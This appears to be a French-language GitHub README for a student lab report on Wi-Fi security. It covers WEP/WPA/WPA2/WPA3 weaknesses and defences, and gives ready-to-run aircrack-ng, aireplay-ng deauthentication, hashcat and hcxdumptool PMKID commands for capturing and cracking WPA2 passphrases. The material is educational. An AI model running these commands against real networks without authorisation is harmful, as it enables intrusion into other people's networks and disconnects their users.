Skip to content

Kim-San04/Wireless-Hacking-Concepts-Methods-Security

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Header

📡 Wireless Security — Concepts, Attaques & Défense

WiFi Aircrack Wireshark Kali Linux

Efrei Type Status

⚠️ Avertissement légal : Ce projet est réalisé dans un environnement de laboratoire contrôlé à des fins strictement pédagogiques.


🎯 Introduction

Étude technique sur l'exploitation et la sécurisation des réseaux IEEE 802.11. Ce rapport couvre les protocoles de sécurité Wi-Fi, les techniques d'attaque courantes et les contre-mesures à mettre en place.


🌐 Technologies & Protocoles

Protocole Sécurité Vulnérabilités
WEP Très faible RC4 cassable en < 5 min
WPA Faible TKIP vulnérable, KRACK
WPA2 Moyen Attaques dictionnaire sur handshake
WPA3 Fort SAE résiste au brute-force offline

🤝 Le Handshake WPA2

Le handshake 4-way est la cible principale des attaques sur WPA2-Personal.

# 1. Passer en mode moniteur
airmon-ng start wlan0

# 2. Scanner les réseaux environnants
airodump-ng wlan0mon

# 3. Capturer le handshake (attendre ou forcer une déauth)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 4. Forcer la reconnexion d'un client
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

🛠️ Méthodologie d'Attaque

Attaque par dictionnaire sur WPA2

# Crack du handshake capturé avec une wordlist
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# Alternative avec hashcat (GPU)
hashcat -m 22000 capture.hccapx wordlist.txt

Evil Twin (Faux Point d'Accès)

Création d'un AP clone pour intercepter les connexions via hostapd + dnsmasq.

PMKID Attack (WPA2 sans client)

# Capture du PMKID sans attendre un client
hcxdumptool -i wlan0mon --enable_status=3 -o capture.pcapng

# Conversion et crack
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt

🛡️ Stratégies de Défense

Mesure Description
WPA3 Enterprise Authentification 802.1X + certificats
Mots de passe forts +20 caractères aléatoires
WIDS/WIPS Détection d'APs non autorisés
Segmentation VLAN Isolation du réseau Wi-Fi invité
VPN obligatoire Chiffrement applicatif en complément

🏁 Conclusion

La sécurité Wi-Fi repose avant tout sur le choix du protocole (WPA3 recommandé), la robustesse des mots de passe et la surveillance active du réseau. WPA2 reste exploitable via des attaques dictionnaire si la passphrase est faible.


Portfolio LinkedIn GitHub

Footer

About

WPA2/WPA3, Aircrack-ng, Handshake attacks, Evil Twin — Wireless Security | ESMT Dakar

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors